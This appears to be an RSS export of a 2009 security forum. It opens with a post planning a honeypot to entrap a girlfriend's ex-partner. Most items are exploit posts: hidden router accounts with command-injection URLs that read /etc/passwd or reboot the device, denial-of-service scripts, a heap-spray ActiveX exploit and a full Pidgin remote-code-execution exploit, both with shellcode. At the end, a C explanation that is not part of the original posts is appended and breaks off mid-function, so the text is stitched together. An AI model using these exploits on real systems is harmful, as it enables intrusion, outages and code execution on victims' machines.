A while ago my girlfriend's daughter was molested by her father. It never went to court since a 2 year old's statement doesn't count for much these days. Soon he will be able to have visitation rights again and will be able to have her over for the night at weekends. Various events have taken place which have resulted with him being cautioned for harassing us; a couple more and he will no longer be allowed visitation. He is employed in the IT industry as am I. There is currently a court battle going on over money etc, he is very interested in what we are doing in relation to this. <br />
<br />
<br />
What I am thinking of doing is setting up a very insecure email server from my home network, finding some reason to email him and monitoring the server. After speaking to my girlfriend it seems like he is the kind of person who would try to hack it (especially considering the on going court case.) I'm going to disconnect all other machines from the network and add a linux server, on this I will run a sniffer and VMware. Within VMWare I intend to run an XP box. I will isolate the virtual from the rest of the host OS using ebtables and from directly connecting to the router using iptables (whilst still allowing NAT and port forwarding.) I will also ask our ISP to monitor our connection.<br />
<br />
Obviously it is very easy to make an XP machine insecure, however if I was him then I would do any hacking etc via some kind of proxy or onion routing system. I've been racking my mind for how to tackle this. The only things I can think of are UDP based services (very open rsync over UDP maybe?) TOR doesn't support UDP (I imagine I2P, Freenet etc don't either) however Socks5 proxies do support UDP. The only sure-fire way that I can think of to make sure that he doesn't use some form of proxy would be to use a service which initiates a connection back to his computer (or having a massive black list of all proxies/TOR nodes etc.) I can't think of anything which would accomplish this without seeming too obvious. Can anyone help?<br />
<br />
Thanks,<br />
<br />
Fractal5<br />
<br />
]]></description>
		<pubDate>Sat, 14 Nov 2009 00:52:13 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32212</guid>
	</item>
	<item>
		<title>Metasploit 2.4</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32244</link>
		<description><![CDATA[Hello everybody,<br />
<br />
hope someone can help me,<br />
I've installed Metasploit Framework 2.4 on Windows 7 (with the msfconsole.bat etc.)<br />
directory is C:&#092;programs&#092;metasploit framework&#092;<br />
Now, if I try to open msfconsole.bat,<br />
only my computer or administrator name comes up...<br />
<br />
User-@User-PC ~<br />
$<br />
<br />
<br />
Does anybody know what I'm doing wrong? The same was working on Vista before.<br />
Maybe something is wrong with the directory in a batch file or somewhere?<br />
<br />
thank you]]></description>
		<pubDate>Fri, 13 Nov 2009 21:55:49 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32244</guid>
	</item>
	<item>
		<title>How To Find Out Ip Address From Mac Address ?</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28219</link>
		<description><![CDATA[There's this guy doing ARP spoofing on my network. I came to know his MAC address through a Wireshark packet capture. But I need to know who this guy is. I'm assuming I must do a RARP request, but how do I do that? Any software that lets me find the real IP address from a MAC address?<br />
<br />
 <a href='http://img245.imagevenue.com/img.php?image=86159_Untitled_122_560lo.jpg' class='bbc_url' title='External link' rel='nofollow external'>http://img245.imagevenue.com/loc560/th_86159_Untitled_122_560lo.jpg</a>]]></description>
		<pubDate>Wed, 11 Nov 2009 19:57:46 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28219</guid>
	</item>
	<item>
		<title><![CDATA[What's Your Favorite Linux Distribution ?]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=25780</link>
		<description><![CDATA[Hi there ....<br />
 There are many Linux distributions ....<br />
 What's your Linux distribution?<br />
 What's your reason for using it?]]></description>
		<pubDate>Wed, 11 Nov 2009 19:11:31 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=25780</guid>
	</item>
	<item>
		<title>Nemesis: Problem With -O O Ip-Options-File Switch</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32241</link>
		<description><![CDATA[Hello all,<br />
<br />
I am using nemesis on windows XP to generate fake packets. I want to give "[94][04][00][00]" in IP option section. I have created a file using hex editor which contains these bytes. However, when I am giving it in -O switch, I am getting 4 Zeros in the option section ([00][00][00][00]). Interestingly, if I write "abcd[94][04][00][00]" in the text file, I see "[94][04][00][00][00][00][00][00]" as IP option. I see same the output if instead of file, I accept IP option from stdin (using "-O -" switch). Please tell me where I am going wrong. Thanks in advance.]]></description>
		<pubDate>Wed, 11 Nov 2009 15:32:46 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32241</guid>
	</item>
	<item>
		<title><![CDATA[Palm Pre Webos Version &#60;= 1.1 Floating Point Exception]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32237</link>
		<description><![CDATA[<pre class='prettyprint'>
I.  Description 

The Palm Pre WebOS version &lt;= 1.1 suffers from a floating point exception vulnerability when 
attempting to view a specially crafted web page. This vulnerability has been addressed in the latest 
patch from Palm and all users are recommended to update to WebOS version 1.2+. 

II.  Impact 

If a user views a malicious web page that contains specially crafted data, the "LunaSysMgr" process 
will crash, causing the device to simulate a reboot.  The bug itself is a floating point exception 
that crashes the "LunaSysMgr" process and forces the device to restart the process, simulating a 
reboot of the system.  At the time of the discovery, the greatest risk to the system was a denial of 
service condition. 

The crash does not occur when viewing the malicious web page while in landscape mode. 

III. Proof of Concept 

The Palm Pre WebOS version &lt;= 1.1 will crash upon opening a web page that contains 50,280 bytes of 
data or greater and attempts to refresh the page.  Upon viewing the malicious web page the 
LunaSysMgr process will generate a floating point exception and simulate a system "reboot". 

The following code will trigger the issue 

"&lt;meta http-equiv="refresh" content="1"&gt;AAAAA..." using 50280 or more characters after the refresh. 

IV. About 

This vulnerability was discovered by Townsend Ladd Harris &lt;PalmPreHacker &#91;a t&#93; gmail.com&gt; 

Vulnerability details will be posted at: 
http://tlhsecurity.blogspot.com/2009/10/palm-pre-webos-version-11-floating.html
</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:56:26 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32237</guid>
	</item>
	<item>
		<title>3Com Officeconnect Firewall/router Multiple Remote Vulnerabilities</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32236</link>
		<description><![CDATA[<pre class='prettyprint'>
************************************************************** 
Product: 3Com OfficeConnect Firewall/Router 
Website: http://www.3com.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote command execution and password disclosure 
************************************************************** 

####### Admin password disclosure ####### 

1) SSH/Telnet to router using one of these hidden accounts: 
  support:support 
  user:5 
  nobody:admin 
2) Type 9 
3) Type 1 
3) Type 3 to dump the configuration 
4) Locate the sysPassword field: 
   &lt;sysPassword value="cXdlcnR5Cg=="/&gt; 
5) Decode the admin password: 
  roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d 
  qwerty 


####### Remote command execution  ####### 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd 

To see the command output you need to log into the router, however the 
command is executed even the user is not logged in, so if you don't 
have access to the device a DOS is also possible: 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:53:36 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32236</guid>
	</item>
	<item>
		<title>Emc Replistor Server (Rep_Serv.exe) 6.3.1.3 Remote Dos</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32235</link>
		<description><![CDATA[<pre class='prettyprint'>
&lt;?php
    /*
    EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
    service poc
    by Nine:Situations:Group::bellick
     
    */
     
    $host = "192.168.0.1";
    $port = 7144;
     
    $_sock = fsockopen($host, $port, $errno, $errstr, 2);
    if (!$fp) {
        echo "$errstr ($errno)&#092;n";
    } else {
        $_p = "&#092;x54&#092;x93&#092;x00&#092;x00&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41". "&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41".
"&#092;x41&#092;x41&#092;x41&#092;x41";
        fputs($_sock, $_p);
        fclose($_sock);
    }
?&gt;

original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:51:37 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32235</guid>
	</item>
	<item>
		<title>Websense Email Security Web Administrator Dos</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32234</link>
		<description><![CDATA[<pre class='prettyprint'>
Advisory ID:            NSOADV-2009-002 
 Found Date:             28.09.2009 
 Date Reported:          01.10.2009 
 Release Date:           20.10.2009 
 Author:                 Nikolas Sotiriu 
 Mail:                   nso-research (at) sotiriu.de 
 URL:                    http://sotiriu.de/adv/NSOADV-2009-002.txt 
 Vendor:                 Websense (http://www.websense.com/) 
 Affected Products:      Websense Email Security v7.1 
                         Personal Email Manager v7.1 
 Not Affected Products:  Websense Email Security v7.1 Hotfix 4 
                         Personal Email Manager v7.1 Hotfix 4 
 Remote Exploitable:     Yes 
 Local Exploitable:      Yes 
 Patch Status:           Patched with Hotfix 4 
 Disclosure Policy:      http://sotiriu.de/policy.html 
 Thanks to:              Thierry Zoller: for the permission to use his 
                                         Policy 



Background: 
=========== 

Websense Email Security software incorporates multiple layers of 
real-time Web security and data security intelligence to provide 
leading email protection from converged email and Web 2.0 threats. 
It helps to manage outbound data leaks and compliance risk, and enables 
a consolidated security strategy with the trusted leader in Essential 
Information Protection. 

(Product description from Websense Website) 

The Websense Email Security Web Administrator is a webfrontend, which 
enables you to access the message administration, directory management 
and to view the log. 



Description: 
============ 

The Web Administrator frontend (STEMWADM.EXE) listens by default on port 
TCP/8181. 

If an attacker sends a HTTP Request to port 8181 without waiting for a 
response the webserver crashes. The proof of concept script just sends 
a "GET /index.asp" and closes the socket. The server can not response 
to the request anymore and dies. 

By default the service will always restart after a crash. So the poc 
will send the request until it will be stopped. 



Proof of Concept : 
================== 

#!/usr/bin/perl 
use Socket; 

(($target = $ARGV&#91;0&#93;) && ($port = $ARGV&#91;1&#93;)) || die "Usage: $0 ", 
"&lt;target&gt; &lt;port&gt; &#092;n"; 

print "&#092;nThe Webserver on http://$target:$port should be dead until", 
"this script is running&#092;n"; 

while (1) { 
$ip = inet_aton($target) || die "host($target) not found.&#092;n"; 
$sockaddr = pack_sockaddr_in($port, $ip); 
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.&#092;n"; 

connect(SOCKET, $sockaddr) || die "connect $target $port error.&#092;n"; 

print SOCKET "GET /index.asp"; 
print "Request sent ...&#092;n"; 

close(SOCKET); 

sleep 1; 

}; 

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:50:27 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32234</guid>
	</item>
	<item>
		<title>Everfocus Edr1600 Remote Authentication Bypass</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32233</link>
		<description><![CDATA[<pre class='prettyprint'>
************************************************************** 
Product: &#91;b&#93;Everfocus EDR1600&#91;/b&#93; 
Version affected: all 
Website: http://www.everfocus.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote DVR authentication bypass 
************************************************************** 

The EDR1600 firmware doesn't handle user authentication and sessions correctly. 

This exploit lets you connect to every remote DVR (without username 
and password) and see the live cams :) 

Exploit: http://www.andreafabrizi.it/files/EverFocus_edr1600_Exploit.tar.gz

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:48:42 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32233</guid>
	</item>
	<item>
		<title>2Wire Remote Denial Of Service</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32232</link>
		<description><![CDATA[<pre class='prettyprint'>
======================================== 
              2WIRE REMOTE DENIAL OF SERVICE 
        ======================================== 


Device:      2wire Gateway Router/Modem 
Vulnerable Software:   =&lt; 5.29.52 
Vulnerable Models:   1700HG 
        1701HG 
        1800HW 
        2071 
        2700HG 
        2701HG-T 
Release Date:    2009-10-29 
Last Update:    2009-09 
Critical:    Moderately critical 
Impact:    Denial of service 
     Remote router reboot 
Where:      From remote 
     In the remote management interface 
Solution Status:   Vendor issued firmware patches 
        Providers are in charge of applying the patches 
WebVuln Advisory:   1-003 


 BACKGROUND 
======================= 

The remote management interface of some 2wire modems is enabled by 
default. 
This interface runs over SSL on port 50001 with an untrusted issuer 
certificate. 

++Spanish (translated) 
Some 2wire modems have the remote interface enabled by default. 
The interface uses SSL with an invalid certificate on port 50001. 


  DESCRIPTION 
======================= 

Some 2wire modems are vulnerable to a remote denial of service attack. 
By requesting a special URL from the Remote Management interface, an 
unauthenticated user can remotely reboot the complete device. 

++ (Spanish, translated) 
Some 2wire modems are vulnerable to a denial of service attack. 
An unauthenticated user can reboot the device by sending a request to 
the remote administration interface. 


 EXPLOIT / POC 
======================= 

https://&lt;remoteIP&gt;:50001/xslt?page=%0d%0a 


 WORKAROUND 
======================= 

Disable Remote Management in Firewall -&gt; Advanced Settings. 

++ (Spanish, translated) 
Disable Remote Administration in Firewall -&gt; Advanced Settings. 


  DISCLOSURE TIMELINE 
======================= 

2009/09/06 - Vulnerability discovered 
2009/09/08 - Vendor contacted 


                 ======================= 

                          h k m 
                       hkm@hakim.ws 

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:45:21 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32232</guid>
	</item>
	<item>
		<title>Safari 4.0.3 (Win32) Css Remote Denial Of Service Exploit</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32231</link>
		<description><![CDATA[<pre class='prettyprint'>
#!/usr/bin/perl
# ithinkthereforeiexist.pl
# AKA
# Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit
#
# Jeremy Brown &#91;0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com&#93; 11.09.2009
#
# *********************************************************************************************************
# Another remotely triggerable STACK_OVERFLOW in Safari on Windows...
#
# (204.72c): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=000333d8 ebx=000fbd16 ecx=00000000 edx=037b3fd0 esi=037b3fd0 edi=0001bfad
# eip=00ae19af esp=00032ea8 ebp=00032f28 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:&#092;Program Files&#092;Safari&#092;CoreFoundation.dll - 
# CoreFoundation!_CFStringEncodeByteStream+0x2d:
# 00ae19af 8365b800        and     dword ptr &#91;ebp-48h&#93;,0 ss:0023:00032ee0=00000000
#
# A product of Browser Fuzzer 3 :)
#
# "We do it in the dark, with smiles on our faces"
#
# *********************************************************************************************************
# ithinkthereforeiexist.pl

$html = "ithinkthereforeiexist.html";
$css  = "ithinkthereforeiexist.css";

$size = 114600;

$htmldata = "&lt;html&gt;&#092;n&lt;head&gt;&#092;n&lt;link rel=&#092;"stylesheet&#092;" href=&#092;"" . $css . "&#092;" /&gt;&#092;n&lt;/head&gt;&#092;n";
$htmldata = $htmldata . "&lt;body&gt;&#092;n&lt;div id=&#092;"die&#092;"&gt;&#092;n&lt;/div&gt;&#092;n&lt;/body&gt;&#092;n&lt;/html&gt;";

$cssdata = "#die&#092;n{&#092;nbackground: url(" . "A" x $size . ");&#092;n}";

     open(FD, '&gt;' . $html);
     print FD $htmldata;
     close(FD);

     open(FD, '&gt;' . $css);
     print FD $cssdata;
     close(FD);


</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:38:08 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32231</guid>
	</item>
	<item>
		<title>Quiksoft Easymail 6 (Addattachment) Remote Buffer Overflow Exploit</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32230</link>
		<description><![CDATA[<pre class='prettyprint'>
&lt;head&gt;
    &lt;!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      -- 
      -- Its old and the latest version doesn't support this method. 
      -- I was bored and a similar post sparked my interest. 
      -- 
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      -- 
      -- Written by:
      -- bmgsec (bmgsec &#91;at&#93; gmail.com / www.bmgsec.com.au)
      --  --&gt;
 &lt;title&gt;Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit&lt;/title&gt;
&lt;object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'&gt;&lt;/object&gt;
&lt;script language='j&#097;v&#097;script'&gt;
       function str_repeat ( input, multiplier ) {
               return new Array(multiplier+1).join(input);
       }

       //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
       shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+
                            "%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+
                            "%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+
                            "%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+
                            "%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+
                            "%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+
                            "%u7114%u569b%u7173%u057b%ue11a%ucae7");

       bigblock = unescape("%u9090%u9090");
       headersize = 20;
       slackspace = headersize + shellcode.length;

       while (bigblock.length &lt; slackspace)
               bigblock += bigblock;

       fillblock = bigblock.substring(0, slackspace);
       block = bigblock.substring(0, bigblock.length - slackspace);

       while (block.length + slackspace &lt; 200000)
               block = block + block + fillblock;

       memory = new Array();
       for (i=0; i&lt;500; i++)
               memory&#91;i&#93; = block + shellcode;

       buffer = str_repeat('A', 433);
       buffer += "BBBB";
       buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

       test.AddAttachment(buffer, 1);
&lt;/script&gt;
&lt;/head&gt;
&lt;/html&gt;

</pre><br />
<br />
Source: <a href='http://www.milw0rm.com/exploits/9705' class='bbc_url' title='External link' rel='nofollow external'>http://www.milw0rm.com/exploits/9705</a>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:36:40 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32230</guid>
	</item>
	<item>
		<title><![CDATA[Pidgin Msn &#60;= 2.5.8 Remote Code Execution Exploit]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32229</link>
		<description><![CDATA[<pre class='prettyprint'>
/*
* Pidgin MSN &lt;= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
*        Pidgin is a multi-protocol Instant Messenger.
*
*        This is an exploit for the vulnerability&#91;1&#93; discovered in Pidgin by core-security&#91;2&#93;.
*        The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
*        which could lead to memory corruption.
*
* Affected versions :
*        Pidgin &lt;= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Platforms :
*        Windows, Linux, Mac
*
* Fix :
*        Fixed in Pidgin 2.5.9
*        Update to the latest version : http://www.pidgin.im/download/
*
* References :
*        &#91;1&#93; http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
*        &#91;2&#93; http://www.coresecurity.com/content/libpurple-arbitrary-write
*        &#91;3&#93; http://www.pidgin.im/news/security/?id=34
*
* Usage :
*        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
*        javac.exe -cp "%classpath%;.&#092;jml-1.0b3-full.jar" PidginExploit.java
*        java -cp "%classpath%;.&#092;jml-1.0b3-full.jar" PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

   private MsnMessenger messenger;
   private String login;
   private String password;
   private String target;

   private int session_id = NumberUtils.getIntRandom();

   private byte shellcode&#91;&#93; = new byte&#91;&#93; {

           /*
            * if you use the stack in your shellcode do not forget to change esp because eip == esp == kaboom !
            * sub esp,500
            */
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


           /*
            * windows/exec - 121 bytes
            * http://www.metasploit.com
            * EXITFUNC=process, CMD=calc.exe
            */
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };

   // reteip = pointer to the return address in the stack
   // The shellcode will be written just before reteip
   // and reteip will automatically point to the shellcode. It's magic !
   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8

   private int neweip;
   private byte&#91;&#93; payload = new byte&#91;shellcode.length + 4&#93;;
   private int totallength = reteip + 4;

   public static void main(String&#91;&#93; args) throws Exception {

       if(args.length != 3){
           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
       }else{
           PidginExploit exploit = new PidginExploit(args&#91;0&#93;,args&#91;1&#93;,args&#91;2&#93;);
           exploit.start();
       }

   }

   public PidginExploit(String login, String password, String target){
       this.login = login;
       this.password = password;
       this.target = target;

       neweip = reteip - shellcode.length ;

       for(int i=0;i&lt;shellcode.length;i++)
           payload&#91;i&#93; = shellcode&#91;i&#93;;

       payload&#91;shellcode.length&#93; = (byte)(neweip & 0x000000FF);
       payload&#91;shellcode.length + 1&#93; = (byte)((neweip & 0x0000FF00) &gt;&gt; 8);
       payload&#91;shellcode.length + 2&#93; = (byte)((neweip & 0x00FF0000) &gt;&gt; 16);
       payload&#91;shellcode.length + 3&#93; = (byte)((neweip & 0xFF000000) &gt;&gt; 24);
   }

   public void start() {
       messenger = MsnMessengerFactory.createMsnMessenger(login,password);
       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

       messenger.setLogIncoming(false);
       messenger.setLogOutgoing(false);

       initMessenger(messenger);
       messenger.login();
   }

   protected void initMessenger(MsnMessenger messenger) {

   messenger.addContactListListener(new MsnContactListAdapter() {

           public void contactListInitCompleted(MsnMessenger messenger) {

               final Object id = new Object();

               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

                   public void switchboardStarted(MsnSwitchboard switchboard) {

                       if (id != switchboard.getAttachment())
                           return;

                       switchboard.inviteContact(Email.parseStr(target));
                   }

                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                       if (id != switchboard.getAttachment())
                           return;

                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                       msg.setIdentifier(NumberUtils.getIntRandom());
                       msg.setSessionId(session_id);
                       msg.setOffset(0);
                       msg.setTotalLength(totallength);
                       msg.setCurrentLength(totallength);

                        // This flag creates a bogus MsnSlpPacket in Pidgin's memory whose buffer points to NULL.
                        // The data message that follows uses that buffer to rewrite memory on the stack.
                        msg.setFlag(0x1000020);

                       msg.setP2PDest(target);

                       switchboard.sendMessage(msg);

                       System.out.println("First packet sent, waiting for the ACK");

                   }

                   public void switchboardClosed(MsnSwitchboard switchboard) {
                       System.out.println("switchboardClosed");
                       switchboard.getMessenger().removeSwitchboardListener(this);
                   }

                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
                       System.out.println("contactLeaveSwitchboard");
                   }
               });
               messenger.newSwitchboard(id);
           }
       });

       messenger.addMessageListener(new MsnMessageAdapter(){

           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

                //We receive the ACK of our first packet; its identifier is the ID of the new bogus packet.
                //The data message writes the payload at offset neweip into that packet's (NULL) buffer.
                MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                        payload.length, payload, target);

               switchboard.sendMessage(msg);
               System.out.println("ACK received && Payload sent !");
               System.out.println("Exploit OK ! CTRL+C to quit");

           }
       });



       messenger.addMessengerListener(new MsnMessengerAdapter() {

           public void loginCompleted(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " login");
           }

           public void logout(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " logout");
           }

           public void exceptionCaught(MsnMessenger messenger,
                   Throwable throwable) {
               System.out.println("caught exception: " + throwable);
           }
       });

   }
}


</pre><br />
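Added example, not part of the original post or of the milw0rm exploit above. It is written in C because what the Java code drives is a native memory write: the comment in the exploit says the flagged first packet leaves an SLP message whose buffer points to NULL, and the data message then supplies offset = neweip with a payload of shellcode.length + 4 bytes, so that offset + payload length equals the announced totallength (reteip + 4). The struct, the addresses, the shellcode length and the function names below are assumptions for the demonstration; none of it is Pidgin's code. The unchecked copy shows why a NULL buffer turns the wire offset into an absolute destination, and the checked form shows that length arithmetic alone would not stop this chunk: only refusing to write into a message with no allocated buffer does.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the "bogus MsnSlpPacket" the exploit comment
 * describes: a reassembly buffer plus the total length announced in the
 * first packet. Not Pidgin's real structure. */
typedef struct {
    unsigned char *buffer;   /* NULL for the bogus message */
    uint32_t       size;     /* msg.setTotalLength(...) from the first packet */
} slp_msg_t;

/* Mirrors the Java arithmetic (reteip and the shellcode length are made up):
 *   neweip      = reteip - shellcode.length
 *   totallength = reteip + 4
 *   payload     = shellcode || neweip  ->  shellcode.length + 4 bytes
 * so offset + payload length == totallength exactly. */
#define RETEIP              0x0804F000u
#define SHELLCODE_LEN       20u
#define EXPLOIT_OFFSET      (RETEIP - SHELLCODE_LEN)   /* neweip */
#define EXPLOIT_TOTAL       (RETEIP + 4u)              /* totallength */
#define EXPLOIT_PAYLOAD_LEN (SHELLCODE_LEN + 4u)

static unsigned char exploit_payload[EXPLOIT_PAYLOAD_LEN];  /* contents irrelevant here */
static unsigned char store[64];                             /* backing store of a real transfer */
static const unsigned char legit_chunk[] = "hello";         /* constructed sample chunk */

static slp_msg_t bogus_msg = { NULL,  EXPLOIT_TOTAL };
static slp_msg_t legit_msg = { store, sizeof store };

/* Where an unchecked copy would land. Computed in integer space so the demo
 * never forms or dereferences an invalid pointer. With buffer == NULL the
 * attacker-chosen offset becomes an absolute address: an arbitrary write. */
uintptr_t slp_unchecked_dest(const slp_msg_t *m, uint32_t offset)
{
    return (uintptr_t)m->buffer + (uintptr_t)offset;
}

/* Vulnerable pattern: offset and len come straight from the wire.
 * Only ever called on a legitimate, allocated message in this demo. */
void slp_process_chunk_unchecked(slp_msg_t *m, uint32_t offset,
                                 const unsigned char *data, uint32_t len)
{
    memcpy(m->buffer + offset, data, len);
}

/* Hardened form. Returns 0 when the chunk was stored, -1 when rejected.
 * The exploit chunk satisfies offset + len == size, so the two range checks
 * alone would let it through; the NULL-buffer check is what stops it. */
int slp_process_chunk_checked(slp_msg_t *m, uint32_t offset,
                              const unsigned char *data, uint32_t len)
{
    if (m->buffer == NULL)       return -1;  /* bogus message: nothing allocated */
    if (offset > m->size)        return -1;  /* keeps the subtraction below from wrapping */
    if (len > m->size - offset)  return -1;  /* overflow-safe form of offset + len > size */
    memcpy(m->buffer + offset, data, len);
    return 0;
}

int main(void)
{
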